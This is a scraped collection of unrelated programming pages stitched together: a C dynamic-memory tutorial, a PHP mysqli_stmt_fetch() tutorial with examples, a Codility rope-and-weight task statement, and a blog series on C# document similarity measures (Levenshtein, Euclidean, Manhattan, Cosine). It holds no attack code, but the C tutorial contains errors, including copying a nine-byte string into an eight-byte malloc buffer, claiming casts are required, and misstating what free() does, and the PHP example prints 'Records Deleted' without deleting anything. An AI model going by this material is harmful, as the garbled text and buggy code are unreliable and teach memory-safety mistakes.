The Data is initialised to arithmetic 0(zero) by the kernel in this segment before the program starts executing.
For example,
static int i; // This variable would be in .bss segment
int j; /* j is globally declared. and therefore it
would also be in .bss segment */
Stack Region :
This region is used for great many things while your program executes. The stack holds :
• return addresses at function calls
• arguments passed to the functions
• and local variables for functions. These variables remain in memory as long as the function continues and after that they are erased from the memory.
• It also stores the current state of the CPU.
Heap Memory Region :
• The heap memory area is a region of free memory from which chunks of memory allocated via C dynamic memory allocation functions.
• It contains a linked list of used and free blocks.
• Free blocks is dynamically allocated during run time and static memory allocation takes place during compile time. This requires a meta information about the blocks on the heap, which is stored in front of every block so to keep an eye on available/free blocks.
To know more about memory layout in C – Click here.
To know about memory layout of C++ – Click Here.
Dynamic Memory Functions of C :
The C dynamic memory allocation functions are defined in stdlib.h header.
Function Description Syntax :
malloc() allocates the specified number of bytes void *malloc(int num);
realloc() increases or decreases the size of the specified block of memory. Reallocates it if needed void *realloc(void *address, int newsize);
calloc() allocates the specified number of bytes and initializes them to zero void *calloc(int num, int size);
free() releases the specified block of memory back to the system void free(void *address);
C malloc() Function :
• malloc() function is used to allocate space in memory during the execution of the programme.
• malloc() does not initialise allocated memory during run time. It carries garbage value.
• malloc() function returns null pointer if it could not able to allocate requested amount of memory.
• malloc() stands for memory allocation.
Syntax of malloc() Function :
p = (cast-type*)malloc(byte-size)
Here, p is pointer of cast-type. The malloc() function returns the address of the allocated memory to the pointer with size of byte-size. When the space is not enough, allocation fails and returns NULL pointer.
p = (int*)malloc(100*sizeof(int));
This statement will allocate 200 bytes in a 16 bit processor system and the pointer p points to the address of first byte of memory.
C calloc() Function :
• The calloc() function stands for contiguous allocation of memory.
• It is just like like malloc() function with a difference that calloc() initialises the allocated memory to 0(zero), but malloc doesn’t.
Syntax of calloc() :
p = (cast-type*)calloc(n,element-size);
Here, p is pointer of cast-type. The calloc() function allocates with contiguous space in memory and returns the address of the allocated memory to the pointer p with size of byte-size. If the space is insufficient, allocation fails and returns NULL pointer.
p = (float*)calloc(25,sizeof(float));
This statement creates an array of 25 elements each of size of float, i.e, 4 bytes in a 16 bit processor system. In other words, the above statement allocates contiguous space in memory for 25 elements each of size 4 bytes
Difference between calloc() and malloc() function :
Basis malloc() calloc()
Number of Blocks Allocate It allocates only single block of requested memory It allocates multiple blocks of requested memory
Example : int *p; p = malloc(10*sizeof(int)); ⇒ 10*2 = 20 bytes of memory only allocated in one block. int *p; p = calloc(10, 10 * sizeof(int) );
10 blocks of memory will be created and each block is of 10*2 = 20 bytes.
Therefore total memory occupied = 20*10 = 200 bytes
Initialization of Allocated Memory malloc () does not initializes the allocated memory during runtime. It contains garbage values calloc () initializes the allocated memory to zero
Type-casting is necessary in both functions type cast must be done since this function returns void pointer
int *p;
p=(int*)malloc(sizeof(int)*10);
Same as malloc () function.
int *p;
p=(int*)calloc( 10, 10*sizeof(int));
Number of Arguments malloc() takes a single argument( the amount of memory to allocate in bytes). calloc() needs 2 arguments( the number of variables to allocate memory, and the size in bytes of a single variable).
C realloc() Function :
• realloc() stands for reallocation of allocated memory.
• This function modifies memory allocated by malloc() and calloc() functions to new size.
• Reallocation is necessary in the case if the previously allocated memory is more than sufficient or insufficient.
• If during relocation, enough space does not exist in memory to extend the current block, then
• Step 1 : A new block is allocated for the full size of relocation,
• Step 2 : Copies the existing data to the new block and
• Step 3 : Frees the old block.
Syntax of realloc() Function :
p = realloc(p,new_size);
Here, pointer p is reallocated with size of new_size.
C free() Function :
• When the program no longer needs the dynamically allocated objects allocated with either calloc(), malloc() or realloc(), the it must be freed, because they remains in memory even the program stops. So, It is explicitly removed by the programmer using free() function.
• free () function frees/deallocate the allocated memory and returns the memory to the system.
• The space freed by the free() function, guarantee that there is no data remains impaired. Therefore you cannot access the same area once released.
Syntax of free() Function
free(p);
This statement cause the space in memory pointer by p to be deallocated.
Example of malloc(), calloc(), realloc() and free() functions :
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main()
{
char *m,*c;
m = (char*)malloc(8*sizeof(char));
c = (char*)calloc(1,8*(sizeof(char)));
if(m==NULL && c==NULL )
{
printf("Couldn't able to allocate requested memory\n");
}
else
{
printf("\n malloc() initial initialization value = %d (some garbage value)", *m);
printf("\n calloc() initial initialization value = %d (always)", *c);
strcpy(m, "edugrabs");
strcpy(c, "edugrabs");
}
printf("\nContent of Dynamically allocated memory by malloc: %s",m);
printf("\nContent of Dynamically allocated memory by calloc: %s",c);
m = realloc(m,15*sizeof(char));
if(m==NULL)
{
printf("Couldn't able to reallocate requested memory\n");
}
else
{
strcpy(m,"edugrabs.com");
}
printf("\nContent of Dynamically reallocated memory by realloc: %s",m);
free(m);
free(c);
return 0;
}
Output :
malloc() initial initialization value = 42 (some garbage value)
calloc() initial initialization value = 0 (always)
Content of Dynamically allocated memory by malloc : edugrabs
Content of Dynamically allocated memory by calloc : edugrabs
Content of Dynamically allocated memory by realloc : edugrabs.com
Incoming search terms:
• example of dynamic memory allocation
• dynamic memory allocation in c example
• c flowchart for dynamic memory allocation
• static and dynamic memory allocation with examples
• malloc using diagram
• dynamic memory allocTION DIGRAMM
• dynamic Memory allocation takes place at run time
• dynamic memory allocation in c sample
• Dynamic Memory Allocation example?
• calloc with exanple disgrame#spf=1
Leave a Reply
|
__label__pos
| 0.991075 |
We now have a youtube channel. Subscribe
PHP | mysqli_stmt_fetch() Function
PHP mysqli_stmt_fetch() Function
Hello folks! welcome back to a new edition of our tutorial on PHP. In this tutorial guide, we are going to be studying about the PHP mysqli_stmt_fetch() Function.
The built-in PHP mysqli_stmt_fetch() function fetches results from a prepared statement into the specified variables.
Syntax
Following below is the syntax to use this function -
mysqli_stmt_fetch($stmt);
Parameter Details
Sr.NoParameter & Description
1
stmt(Mandatory)
This is an object representing a prepared statement.
Return Value
This built-in PHP function returns TRUE if the data is fetched, FALSE in case of error and, NULL if there are no more rows in the result.
PHP Version
This PHP function was first introduced in PHP version 5 and works in all the later versions.
Example1
The following below is an example which demonstrates the usage of PHP mysqli_stmt_fetch() function (in a procedural style) -
<?php
$con = mysqli_connect("localhost", "root", "password", "mydb");
mysqli_query($con, "CREATE TABLE myplayers(ID INT, First_Name VARCHAR(255), Last_Name VARCHAR(255), Place_Of_Birth VARCHAR(255), Country VARCHAR(255))");
print("Table Created.....\n");
mysqli_query($con, "INSERT INTO myplayers values(1, 'Kennedy', 'Nkpara', 'PortHarcourt', 'Nigeria')");
mysqli_query($con, "INSERT INTO myplayers values(2, 'Jonathan', 'Trott', 'CapeTown', 'SouthAfrica')");
print("Record Inserted.....\n");
//Retrieving the contents of the table
$stmt = mysqli_prepare($con, "SELECT * FROM myplayers");
//Executing the statement
mysqli_stmt_execute($stmt);
//Binding values in result to variables
mysqli_stmt_bind_result($stmt, $id, $fname, $lname, $pob, $country);
while (mysqli_stmt_fetch($stmt)) {
print("Id: ".$id."\n");
print("fname: ".$fname."\n");
print("lname: ".$lname."\n");
print("pob: ".$pob."\n");
print("country: ".$country."\n");
print("\n");
}
//Closing the statement
mysqli_stmt_close($stmt);
//Closing the connection
mysqli_close($con);
?>
Output
When the above code is executed, it will produce the following result -
Table Created.....
Record Inserted.....
Id: 1
fname: Kennedy
lname: Nkpara
pob: PortHarcourt
country: Nigeria
Id: 2
fname: Jonathan
lname: Trott
pob: CapeTown
country: SouthAfrica
Example2
In an object oriented style the syntax of this function is $stmt->fetch(); Following is the example of this function in an object oriented style $minus -
<?php
//Creating a connection
$con = new mysqli("localhost", "root", "password", "mydb");
$con -> query("CREATE TABLE Test(Name VARCHAR(255), AGE INT)");
$con -> query("insert into Test values('Kennedy', 27),('Paul', 30),('Justice', 28)");
print("Table Created.....\n");
$stmt = $con -> prepare( "SELECT * FROM Test WHERE Name in(?, ?)");
$stmt -> bind_param("ss", $name1, $name2);
$name1 = 'Kennedy';
$name2 = 'Paul';
print("Records Deleted.....\n");
//Executing the statement
$stmt->execute();
//Binding variables to resultset
$stmt->bind_result($name, $age);
while ($stmt->fetch()) {
print("Name: ".$name."\n");
print("Age: ".$age."\n");
}
//Closing the statement
$stmt->close();
//Closing the connection
$con->close();
?>
Output
When the above code is executed, it will produce the following result -
Table Created.....
Records Deleted.....
Name: Kennedy
Age: 27
Name: Paul
Age: 30
Example3
Following example fetches the results of the DESCRIBE query using the built-in PHP mysqli_stmt_bind_result() and the built-in PHP mysqli_stmt_fetch() functions -
<?php
$con = mysqli_connect("localhost", "root", "password", "mydb");
mysqli_query($con, "CREATE TABLE myplayers(ID INT, First_Name VARCHAR(255), Last_Name VARCHAR(255), Place_Of_Birth VARCHAR(255), Country VARCHAR(255))");
print("Table Created.....\n");
//Description of the table
$stmt = mysqli_prepare($con, "DESC myplayers");
//Executing the statement
mysqli_stmt_execute($stmt);
//Binding values in result to variables
mysqli_stmt_bind_result($stmt, $field, $type, $null, $key, $default, $extra);
while (mysqli_stmt_fetch($stmt)) {
print("Field: ".$field."\n");
print("Type: ".$type."\n");
print("Null: ".$null."\n");
print("Key: ".$key."\n");
print("Default: ".$default."\n");
print("Extra: ".$extra."\n");
print("\n");
}
//Closing the statement
mysqli_stmt_close($stmt);
//Closing the connection
mysqli_close($con);
?>
Output
When the above code is executed, it will produce the following result -
Table Created.....
Field: ID
Type: int(11)
Null: YES
Key:
Default:
Extra:
Field: First_Name
Type: varchar(255)
Null: YES
Key:
Default:
Extra:
Field: Last_Name
Type: varchar(255)
Null: YES
Key:
Default:
Extra:
Field: Place_Of_Birth
Type: varchar(255)
Null: YES
Key:
Default:
Extra:
Field: Country
Type: varchar(255)
Null: YES
Key:
Default:
Extra:
Example4
The following below example fetches the results of the SHOW TABLES query using the built-in PHP mysqli_stmt_bind_result() and the built-in PHP mysqli_stmt_fetch() functions -
<?php
$con = mysqli_connect("localhost", "root", "password");
//Selecting the database
mysqli_query($con, "CREATE DATABASE NewDatabase");
mysqli_select_db($con, "NewDatabase");
//Creating tables
mysqli_query($con, "CREATE TABLE test1(Name VARCHAR(255), Age INT)");
mysqli_query($con, "CREATE TABLE test2(Name VARCHAR(255), Age INT)");
mysqli_query($con, "CREATE TABLE test3(Name VARCHAR(255), Age INT)");
print("Tables Created.....\n");
//Description of the table
$stmt = mysqli_prepare($con, "SHOW TABLES");
//Executing the statement
mysqli_stmt_execute($stmt);
//Binding values in result to variables
mysqli_stmt_bind_result($stmt, $table_name);
print("List of tables in the current database: \n");
while (mysqli_stmt_fetch($stmt)) {
print($table_name."\n");
}
//Closing the statement
mysqli_stmt_close($stmt);
//Closing the connection
mysqli_close($con);
?>
Output
When the above code is executed, it will produce the following result -
Tables Created.....
List of tables in the current database:
test1
test2
test3
Alright guys! This is where we are going to be rounding up for this tutorial post. In our next tutorial, we are going to be discussing about the PHP mysqli_stmt_field_count() Function.
Do feel free to ask your questions where necessary and we will attend to them as soon as possible. If this tutorial was helpful to you, you can use the share button to share this tutorial.
Follow us on our various social media handles available and also subscribe to our newsletter to get our tutorial posts delivered directly to your emails.
Thanks for reading and bye for now.
Post a Comment
Hello dear readers! Please kindly try your best to make sure your comments comply with our comment policy guidelines. You can visit our comment policy page to view these guidelines which are clearly stated. Thank you.
© 2022.WebDesignTutorialz. All rights reserved. Developed by Jago Desain
|
__label__pos
| 0.784673 |
Codility logo
Check out Codility training tasks
Tasks Details
hard
Find the maximum number of ropes that can be attached in order, without breaking any of the ropes.
Task Score
100%
Correctness
100%
Performance
100%
Task description
In a room there are N ropes and N weights. Each rope is connected to exactly one weight (at just one end), and each rope has a particular durability − the maximum weight that it can suspend.
There is also a hook, attached to the ceiling. The ropes can be attached to the hook by tying the end without the weight. The ropes can also be attached to other weights; that is, the ropes and weights can be attached to one another in a chain. A rope will break if the sum of weights connected to it, directly or indirectly, is greater than its durability.
We know the order in which we want to attach N ropes. More precisely, we know the parameters of the rope (durability and weight) and the position of each attachment. Durabilities, weights and positions are given in three arrays A, B, C of lengths N. For each I (0 ≤ I < N):
• A[I] is the durability of the I-th rope,
• B[I] is the weight connected to the I-th rope,
• C[I] (such that C[I] < I) is the position to which we attach the I-th rope; if C[I] equals −1 we attach to the hook, otherwise we attach to the weight connected to the C[I]-th rope.
The goal is to find the maximum number of ropes that can be attached in the specified order without breaking any of the ropes.
Write a function:
int solution(int A[], int B[], int C[], int N);
that, given three arrays A, B, C of N integers, returns the maximum number of ropes that can be attached in a given order.
For example, given the following arrays:
A[0] = 5 B[0] = 2 C[0] = -1 A[1] = 3 B[1] = 3 C[1] = 0 A[2] = 6 B[2] = 1 C[2] = -1 A[3] = 3 B[3] = 1 C[3] = 0 A[4] = 3 B[4] = 2 C[4] = 3
the function should return 3, as if we attach a fourth rope then one rope will break, because the sum of weights is greater than its durability (2 + 3 + 1 = 6 and 6 > 5).
Given the following arrays:
A[0] = 4 B[0] = 2 C[0] = -1 A[1] = 3 B[1] = 2 C[1] = 0 A[2] = 1 B[2] = 1 C[2] = 1
the function should return 2, as if we attach a third rope then one rope will break, because the sum of weights is greater than its durability (2 + 2 + 1 = 5 and 5 > 4).
Write an efficient algorithm for the following assumptions:
• N is an integer within the range [0..100,000];
• each element of array A is an integer within the range [1..1,000,000];
• each element of array B is an integer within the range [1..5,000];
• each element of array C is an integer such that −1 ≤ C[I] < I, for each I (0 ≤ I < N).
Copyright 2009–2019 by Codility Limited. All Rights Reserved. Unauthorized copying, publication or disclosure prohibited.
Solution
Programming language used C
Total time used 5 minutes
Effective time used 5 minutes
Notes
not defined yet
Task timeline
|
__label__pos
| 0.987927 |
Nick Grattan's Blog
About Microsoft SharePoint, .NET, Natural Language Processing and Machine Learning
Summary – Document and String Similarity/Distances Measures in C#
leave a comment »
MachinesThis post summarizes a number of recent posts on this blog showing how to calculate similarity and distance measures in C# for documents and strings.
First, documents can be represented by a “Bag of Words” (a list of the unique words in a document) or a “Frequency Distribution” (a list of the unique words in a document together with the occurrence frequency).
Bag of Words and Frequency Distributions in C#
The simplest similarity measure covered in this series is the Jaccard Similarity measure. This uses a bag of words and compares the number of common words between two documents with the overall number of words. This does not take into account the relative frequency nor the order of the words in the two documents.
Jaccard Similarity Index for measuring Document Similarity
Three measures using Frequency Distributions are described. In all these cases a n-dimensional space is created from the Frequency Distribution with a dimension for each word in the documents being compared. They are:
1. Euclidean Distance – The shortest distance between two documents in the Frequency Distribution space.
2. Manhattan Distance – The sum of all the sides in the hyper rectangle formed around two documents in the Frequency Distribution Space.
3. Cosine Distance – The cosine of the angle subtended at the origin between two documents in the Frequency Distribution Space.
These measures take into account the word frequency, but Cosine Distance cannot distinguish between documents where the relative frequency of words is the same (rather than the absolute frequency). They do not take into account the order of the words in the documents.
Euclidean, Manhattan and Cosine Distance Measures in C#
The final measure is the Levenshtein Minimum Edit Distance. This measure aligns two documents and calculates the number of inserts, deletes or substitutions that are required to change the first document into the second document, which may not necessarily be the same length. This measure takes into account the words, the frequency of words and the order of words in the document.
Levenshtein Minimum Edit Distance in C#
By using MinHash and Locality Sensitivity Hashing, similar documents can be identified very, very efficiently – these techniques are related to the Jaccard Similarity Index.
MinHash for Document Fingerprinting in C#
Locality Sensitivity Hashing for finding similar documents in C#
Written by Nick Grattan
July 10, 2014 at 6:21 pm
Levenshtein Minimum Edit Distance in C#
with one comment
From Lesk[1] p.254 – “The Levenstein, or edit distance , defined between two strings of not necessarily equal length, is the minimum number of ‘edit operations’ required to change one string into the other. An edit operation is a deletion, insertion or alteration [substitution] of a single character in either sequence “. Thus the edit distance between two strings or documents takes into account not only the relative frequency of characters/words but the position as well. Strings can be aligned too. For example, here’s an alignment of two nucleotide sequences where ‘-‘ represents an insertion:
ag-tcc
cgctca
For these two strings the edit distance is 3 (2 substitutions and 1 insertion/deletion). In the case above the substitutions and inserts/deletes (“indels”) have the same weight. Often, substitutions are given a weight of 2 and indels 1 resulting in an edit distance of 5 for these strings. Substitutions are really an insert with a delete, hence the double weight.
The edit distance calculation uses Dynamic Programming. The algorithm is well described in Jurafsky & Martin[2] p.107. and summarized in these PowerPoint slides. This class implements the edit distance algorithm and text alignment in C#:
/// <summary>
/// Calculates the minimum edit distance (Levenshtein) between two lists of items
/// </summary>
/// <typeparam name="T">Type of item (e.g. characters or string)</typeparam>
public class MinEditDistance<T>
{
public MinEditDistance(List<T> list1, List<T> list2)
{
InsCost = 1;
DelCost = 1;
SubCost = 2;
List1 = list1;
List2 = list2;
}
List<T> List1;
List<T> List2;
Distance[,] D;
// The costs of inserts, deletes, substitutions. Normally run SubCost with 2, others at 1
public int InsCost { get; set; }
public int DelCost { get; set; }
public int SubCost { get; set; }
/// <summary>
/// Calculates the minimum edit distance using weights in InsCost etc.
/// </summary>
/// <returns></returns>
public int CalcMinEditDistance()
{
if (List1 == null || List2 == null)
{
throw new ArgumentNullException();
}
if (List1.Count == 0 || List2.Count == 0)
{
throw new ArgumentException("Zero length list");
}
// prepend dummy value
List1.Insert(0, default(T));
List2.Insert(0, default(T));
int lenList1 = List1.Count;
int lenList2 = List2.Count;
D = new Distance[lenList1, lenList2];
for (int i = 0; i < lenList1; i++)
{
D[i, 0].val = DelCost * i;
D[i, 0].backTrace = Direction.Left;
}
for (int j = 0; j < lenList2; j++)
{
D[0, j].val = InsCost * j;
D[0, j].backTrace = Direction.Up;
}
for (int i = 1; i < lenList1; i++)
for (int j = 1; j < lenList2; j++)
{
int d1 = D[i - 1, j].val + DelCost;
int d2 = D[i, j - 1].val + InsCost;
int d3 = (EqualityComparer<T>.Default.Equals(List1[i], List2[j])) ? D[i - 1, j - 1].val : D[i - 1, j - 1].val + SubCost;
D[i, j].val = Math.Min(d1, Math.Min(d2, d3));
// back trace
if (D[i, j].val == d1)
{
D[i, j].backTrace |= Direction.Left;
}
if (D[i, j].val == d2)
{
D[i, j].backTrace |= Direction.Up;
}
if (D[i, j].val == d3)
{
D[i, j].backTrace |= Direction.Diag;
}
}
return D[lenList1 - 1, lenList2 - 1].val;
}
/// <summary>
/// Returns alignment strings. The default value for T indicates an insertion or deletion in the appropriate string. align1 and align2 will
/// have the same length padded with default(T) regardless of the input string lengths.
/// </summary>
/// <param name="align1">First string alignment</param>
/// <param name="align2">Second string alignment</param>
public void Alignment(out List<T> align1, out List<T> align2)
{
if (D == null)
{
throw new Exception("Distance matrix is null");
}
int i = List1.Count - 1;
int j = List2.Count - 1;
align1 = new List<T>();
align2 = new List<T>();
while (i > 0 || j > 0)
{
Direction dir = D[i, j].backTrace;
int dVal, dDiag = int.MaxValue, dLeft = int.MaxValue, dUp = int.MaxValue;
if ((dir & Direction.Diag) == Direction.Diag)
{
// always favour diagonal as this is a match on items
dDiag = -1;
}
if ((dir & Direction.Up) == Direction.Up)
{
dUp = D[i, j - 1].val;
}
if ((dir & Direction.Left) == Direction.Left)
{
dLeft = D[i - 1, j].val;
}
dVal = Math.Min(dDiag, Math.Min(dLeft, dUp));
if (dVal == dDiag)
{
align1.Add(List1[i]);
align2.Add(List2[j]);
i--;
j--;
}
else if (dVal == dUp)
{
align1.Add(default(T));
align2.Add(List2[j]);
j--;
}
else if (dVal == dLeft)
{
align1.Add(List1[i]);
align2.Add(default(T));
i--;
}
}
align1.Reverse();
align2.Reverse();
}
/// <summary>
/// Writes out the "D" matrix showing the edit distances and the back tracing directions
/// </summary>
public void Write()
{
int lenList1 = List1.Count;
int lenList2 = List2.Count;
Console.Write(" ");
for (int i = 0; i < lenList1; i++)
{
if (i == 0)
Console.Write(string.Format("{0, 6}", "*"));
else
Console.Write(string.Format("{0, 6}", List1[i]));
}
Console.WriteLine();
for (int j = 0; j < lenList2; j++)
{
if (j == 0)
Console.Write(string.Format("{0, 6}", "*"));
else
Console.Write(string.Format("{0, 6}", List2[j]));
for (int i = 0; i < lenList1; i++)
{
Console.Write(string.Format("{0,6:###}", D[i, j].val));
}
Console.WriteLine();
Console.Write(" ");
for (int i = 0; i < lenList1; i++)
{
WriteBackTrace(D[i, j].backTrace);
}
Console.WriteLine();
Console.WriteLine();
}
}
/// <summary>
/// Writes out one backtrace item
/// </summary>
/// <param name="d"></param>
void WriteBackTrace(Direction d)
{
string s = string.Empty;
s += ((d & Direction.Diag) == Direction.Diag) ? "\u2196" : "";
s += ((d & Direction.Up) == Direction.Up) ? "\u2191" : "";
s += ((d & Direction.Left) == Direction.Left) ? "\u2190" : "";
Console.Write(string.Format("{0,6}", s));
}
/// <summary>
/// Represents one cell in the 'D' matrix
/// </summary>
public struct Distance
{
public int val;
public Direction backTrace;
}
/// <summary>
/// Direction(s) for one cell in the 'D' matrix.
/// </summary>
[FlagsAttribute]
public enum Direction
{
None = 0,
Diag = 1,
Left = 2,
Up = 4
}
}
The following code shows how this class can be used:
// example from Speach & Language Processing, Jurafsky & Martin P. 108, cites Krushkal (1983)
[TestMethod]
public void LevenshteinAltDistance()
{
string s1 = "EXECUTION";
string s2 = "INTENTION";
int m = Align(s1, s2, 2, 1, 1, "*EXECUTION", "INTE*NTION");
Assert.AreEqual(8, m);
}
private int Align(string s1, string s2, int subCost = 1, int delCost = 1, int insCost = 1, string alignment1 = null, string alignment2 = null)
{
List<char> l1 = s1.ToList();
List<char> l2 = s2.ToList();
MinEditDistance<char> med = new MinEditDistance<char>(l1, l2);
List<char> a1, a2;
med.SubCost = subCost;
med.DelCost = delCost;
med.InsCost = insCost;
int m = med.CalcMinEditDistance();
Console.WriteLine("Min edit distance: " + m);
med.Write();
med.Alignment(out a1, out a2);
foreach (char c in a1)
{
if (c == default(char))
Console.Write("*");
else
Console.Write(c);
}
Console.WriteLine();
foreach (char c in a2)
{
if (c == default(char))
Console.Write("*");
else
Console.Write(c);
}
Console.WriteLine();
if (alignment1 != null && alignment2 != null)
{
Assert.AreEqual(alignment1, new string(a1.ToArray()).Replace('\0', '*'));
Assert.AreEqual(alignment2, new string(a2.ToArray()).Replace('\0', '*'));
}
return m;
}
The output from this test reports the edit distance to be 8 and the alignment is:
*EXECUTION
INTE*NTION
The “D” matrix with backtrack information is also displayed:
ScreenHunter_78 Jun. 21 08.55
Note that there may be several different possible alignments since backtracking allows multiple routes through the matrix. This web site http://odur.let.rug.nl/kleiweg/lev/ provides an online tool for calculating the edit distance.
[1] “Introduction to Bioinfomatics”, Arthur M. Lesk, 3rd Edition 2008, Oxford University Press
[2] “Speech and Language Processing” D.Jurafsky, J.Martin, 2nd Edition 2009, Prentice Hall
Written by Nick Grattan
June 21, 2014 at 8:10 am
Microsoft Azure to offer Machine Learning Services – Preview July 2014
leave a comment »
Machine Room” Microsoft Azure Machine Learning combines power of comprehensive machine learning with benefits of cloud”
“Machine learning today is usually self-managed and on premises, requiring the training and expertise of data scientists. However, data scientists are in short supply, commercial software licenses can be expensive and popular programming languages for statistical computing have a steep learning curve. Even if a business could overcome these hurdles, deploying new machine learning models in production systems often requires months of engineering investment. Scaling, managing and monitoring these production systems requires the capabilities of a very sophisticated engineering organization, which few enterprises have today.
Microsoft Azure Machine Learning, a fully-managed cloud service for building predictive analytics solutions, helps overcome the challenges most businesses have in deploying and using machine learning. How? By delivering a comprehensive machine learning service that has all the benefits of the cloud. In mere hours, with Azure ML, customers and partners can build data-driven applications to predict, forecast and change future outcomes – a process that previously took weeks and months.”
See this blog post from: Joseph Sirosh, Corporate Vice President of Machine Learning at Microsoft
Written by Nick Grattan
June 20, 2014 at 3:22 pm
Euclidean, Manhattan and Cosine Distance Measures in C#
with one comment
Euclidean, Manhattan and Cosine Distance Measures can be used for calculating document dissimilarity. Since similarity is the inverse of a dissimilarity measure, they can also be used to calculate document similarity. For document similarity the calculations are based on Frequency Distributions. See here for a comparison between Bag of Words and Frequency Distributions and here for using Jaccard Similarity with a Bag of Words.
The calculation starts with a frequency distribution for words in a number of documents. For example:
Freq Dist
A n-dimensional space is then created, with a dimension for each of the words. In the above example a dimension will be created for “Cat”, “Mouse”, “Dog” and “Rat”, so it’s a four dimensioned space. Then, each document is plotted in this space. The following diagram shows the plot for just two of the four dimensions with the Euclidean Distance (the shortest distance between two points):
EuclideanDist
The Manhattan distance is the sum of the lengths of the rectangle formed by the two points:
ManhattanDist
Finally, the Cosine distance is the angle subtended at the origin between the two documents. A value of 0 degrees represents identical documents and 90 degrees dissimilar documents. Note that this distance is based on the relative frequency of words in a document. A document with, say, twice as many occurrences of all words compared to another document will be regarded as identical.
CoSineDist
For a full description of these distance measures see [1], including details on their calculation.
The Euclidean and Manhattan distances are specific examples of a more general Lr-Norm distance measure. The ‘r’ refers to a power term, and for Manhattan this is 1 and for Euclidean it’s 2. Therefore a single class can be used to implement both:
public class LrNorm
{
/// <summary>
/// Returns Euclidean distance between frequency distributions of two lists
/// </summary>
/// <typeparam name="T">Type of the item, e.g. int or string</typeparam>
/// <param name="l1">First list of items</param>
/// <param name="l2">Second list of items</param>
/// <returns>Distance, 0 - identical</returns>
public static double Euclidean<T>(List<T> l1, List<T> l2)
{
return DoLrNorm(l1, l2, 2);
}
/// <summary>
/// Returns Manhattan distance between frequency distributions of two lists
/// </summary>
/// <typeparam name="T">Type of the item, e.g. int or string</typeparam>
/// <param name="l1">First list of items</param>
/// <param name="l2">Second list of items</param>
/// <returns>Distance, 0 - identical</returns>
public static double Manhattan<T>(List<T> l1, List<T> l2)
{
return DoLrNorm(l1, l2, 1);
}
/// <summary>
/// Returns LrNorm distance between frequency distributions of two lists
/// </summary>
/// <typeparam name="T">Type of the item, e.g. int or string</typeparam>
/// <param name="l1">First list of items</param>
/// <param name="l2">Second list of items</param>
/// <param name="r">Power to use 2 = Euclidean, 1 = Manhattan</param>
/// <returns>Distance, 0 - identical</returns>
public static double DoLrNorm<T>(List<T> l1, List<T> l2, int r)
{
// find distinct list of values from both lists.
List<T> dvs = FrequencyDist<T>.GetDistinctValues(l1, l2);
// create frequency distributions aligned to list of descrete values
FrequencyDist<T> fd1 = new FrequencyDist<T>(l1, dvs);
FrequencyDist<T> fd2 = new FrequencyDist<T>(l2, dvs);
if (fd1.ItemFreq.Count != fd2.ItemFreq.Count)
{
throw new Exception("Lists of different length for LrNorm calculation");
}
double sumsq = 0.0;
for (int i = 0; i < fd1.ItemFreq.Count; i++)
{
if (!EqualityComparer<T>.Default.Equals(fd1.ItemFreq.Values[i].value, fd2.ItemFreq.Values[i].value))
throw new Exception("Mismatched values in frequency distribution for LrNorm calculation");
if (r == 1) // Manhattan optimization
{
sumsq += Math.Abs((fd1.ItemFreq.Values[i].count - fd2.ItemFreq.Values[i].count));
}
else
{
sumsq += Math.Pow((double)Math.Abs((fd1.ItemFreq.Values[i].count - fd2.ItemFreq.Values[i].count)), r);
}
}
if (r == 1) // Manhattan optimization
{
return sumsq;
}
else
{
return Math.Pow(sumsq, 1.0 / r);
}
}
}
The following code shows how to use the methods in this class:
double LrNormUT(int r)
{
// Sample from Page 92 "Mining of Massive Datasets"
List l1 = new List();
List l2 = new List();
l1.Add(1);
l1.Add(1);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(2);
l2.Add(2);
l2.Add(2);
l2.Add(2);
return LrNorm.DoLrNorm(l1, l2, r);
}
[TestMethod]
public void Euclidean1()
{
double dist = LrNormUT(2);
Assert.AreEqual(5, (int)dist);
Console.WriteLine("d:" + dist);
}
[TestMethod]
public void Manhattan()
{
double dist = LrNormUT(1);
Assert.AreEqual(7, (int)dist);
Console.WriteLine("d:" + dist);
}
The following class calculates the Cosine Distance:
/// <summary>
/// Calculate cosine distance between two vectors
/// </summary>
public class Cosine
{
/// <summary>
/// Calculates the distance between frequency distributions calculated from lists of items
/// </summary>
/// <typeparam name="T">Type of the list item, e.g. int or string</typeparam>
/// <param name="l1">First list of items</param>
/// <param name="l2">Second list of items</param>
/// <returns>Distance in degrees. 90 is totally different, 0 exactly the same</returns>
public static double Distance<T>(List<T> l1, List<T> l2)
{
if (l1.Count() == 0 || l2.Count() == 0)
{
throw new Exception("Cosine Distance: lists cannot be zero length");
}
// find distinct list of items from two lists, used to align frequency distributions from two lists
List<T> dvs = FrequencyDist<T>.GetDistinctValues(l1, l2);
// calculate frequency distributions for each list.
FrequencyDist<T> fd1 = new FrequencyDist<T>(l1, dvs);
FrequencyDist<T> fd2 = new FrequencyDist<T>(l2, dvs);
if(fd1.ItemFreq.Count() != fd2.ItemFreq.Count)
{
throw new Exception("Cosine Distance: Frequency count vectors must be same length");
}
double dotProduct = 0.0;
double l2norm1 = 0.0;
double l2norm2 = 0.0;
for(int i = 0; i < fd1.ItemFreq.Values.Count(); i++)
{
if (!EqualityComparer<T>.Default.Equals(fd1.ItemFreq.Values[i].value, fd2.ItemFreq.Values[i].value))
throw new Exception("Mismatched values in frequency distribution for Cosine distance calculation");
dotProduct += fd1.ItemFreq.Values[i].count * fd2.ItemFreq.Values[i].count;
l2norm1 += fd1.ItemFreq.Values[i].count * fd1.ItemFreq.Values[i].count;
l2norm2 += fd2.ItemFreq.Values[i].count * fd2.ItemFreq.Values[i].count;
}
double cos = dotProduct / (Math.Sqrt(l2norm1) * Math.Sqrt(l2norm2));
// convert cosine value to radians then to degrees
return Math.Acos(cos) * 180.0 / Math.PI;
}
}
Here are some methods that show how to use this class:
double tol = 0.00001;
[TestMethod]
public void CosineSimple()
{
List<int> l1 = new List<int>();
List<int> l2 = new List<int>();
l1.Add(1);
l1.Add(1);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(2);
l2.Add(2);
l2.Add(2);
l2.Add(2);
double dist = Cosine.Distance(l1, l2);
Console.WriteLine(dist);
Assert.AreEqual(40.3645365730974, dist, tol);
}
